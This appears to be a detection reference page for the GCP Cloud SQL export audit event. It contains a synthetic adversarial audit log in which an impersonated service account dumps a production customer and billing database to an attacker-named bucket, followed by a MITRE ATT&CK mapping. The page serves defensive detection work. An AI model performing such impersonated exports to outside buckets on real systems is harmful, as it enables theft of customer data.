Skip to content

cloudsql.instances.export

GCP

cloudsql.instances.export

service: GCP - Cloud SQL
techniques:

Event

Exports data from a Cloud SQL instance to a Cloud Storage bucket.

Security Context

  • Accessing cloud storage objects can expose sensitive data including backups, configuration files, application data, and customer information.
  • Transferring data to external cloud accounts or regions can bypass network-based data loss prevention controls and exfiltrate large volumes of data.

Log Source

Cloud Audit Logs

Sample Event

Adversarial. Draco — already operating with occamy-pipeline@ impersonation — exports the entire niffler-archive Cloud SQL MySQL instance (production customer DB) as a SQL dump into the adversary-controlled gs://draco-exfil-bucket-666/cloudsql-dump/ URI. This is a single-API-call full-database exfil that bypasses table-level network controls.

{
"protoPayload": {
"@type": "type.googleapis.com/google.cloud.audit.AuditLog",
"status": {},
"authenticationInfo": {
"principalEmail": "occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com",
"principalSubject": "serviceAccount:occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com",
"serviceAccountDelegationInfo": [
{
"firstPartyPrincipal": {
"principalEmail": "draco@fantasticlogs.cloud"
}
}
]
},
"requestMetadata": {
"callerIp": "203.0.113.66",
"callerSuppliedUserAgent": "google-cloud-sdk gcloud/465.0.0 command/gcloud.sql.export.sql invocation-id/90000000000000000000001111101001 environment/None environment-version/None client-os/LINUX client-os-ver/(5,15,0) client-pltf-arch/x86_64 interactive/False from-script/False python/3.11.6 term/xterm-256color (Linux 5.15.0-1052-aws),gzip(gfe)",
"requestAttributes": {
"time": "2026-04-15T17:09:42.221987654Z",
"auth": {}
},
"destinationAttributes": {}
},
"serviceName": "cloudsql.googleapis.com",
"methodName": "cloudsql.instances.export",
"authorizationInfo": [
{
"resource": "projects/fantasticlogs-prod/instances/niffler-archive-mysql",
"permission": "cloudsql.instances.export",
"granted": true,
"resourceAttributes": {
"service": "cloudsql.googleapis.com",
"name": "projects/fantasticlogs-prod/instances/niffler-archive-mysql",
"type": "sqladmin.googleapis.com/Instance"
}
}
],
"resourceName": "projects/fantasticlogs-prod/instances/niffler-archive-mysql",
"request": {
"@type": "type.googleapis.com/google.cloud.sql.v1beta4.SqlInstancesExportRequest",
"project": "fantasticlogs-prod",
"instance": "niffler-archive-mysql",
"body": {
"exportContext": {
"kind": "sql#exportContext",
"fileType": "SQL",
"uri": "gs://draco-exfil-bucket-666/cloudsql-dump/niffler-archive-2026-04-15.sql.gz",
"databases": [
"customers",
"billing"
],
"offload": false
}
}
},
"response": {
"@type": "type.googleapis.com/google.cloud.sql.v1beta4.Operation",
"kind": "sql#operation",
"name": "operation-1776278982-export-001111101001",
"operationType": "EXPORT",
"status": "PENDING",
"user": "draco@fantasticlogs.cloud",
"insertTime": "2026-04-15T17:09:42.300000000Z",
"startTime": "2026-04-15T17:09:42.318000000Z",
"targetId": "niffler-archive-mysql",
"targetProject": "fantasticlogs-prod",
"targetLink": "https://sqladmin.googleapis.com/sql/v1/projects/fantasticlogs-prod/instances/niffler-archive-mysql",
"selfLink": "https://sqladmin.googleapis.com/sql/v1/projects/fantasticlogs-prod/operations/operation-1776278982-export-001111101001"
}
},
"insertId": "evt001111101001",
"resource": {
"type": "cloudsql_database",
"labels": {
"project_id": "fantasticlogs-prod",
"database_id": "fantasticlogs-prod:niffler-archive-mysql",
"region": "us-central1"
}
},
"timestamp": "2026-04-15T17:09:42.187654321Z",
"severity": "INFO",
"logName": "projects/fantasticlogs-prod/logs/cloudaudit.googleapis.com%2Fdata_access",
"operation": {
"id": "operation-1776278982-export-001111101001",
"producer": "cloudsql.googleapis.com",
"first": true
},
"receiveTimestamp": "2026-04-15T17:09:42.567890123Z"
}

MITRE ATT&CK Mapping

Tactics: Exfiltration Collection

Techniques:
  • T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
  • T1530 — Data from Cloud Storage — Adversaries may access data from cloud storage.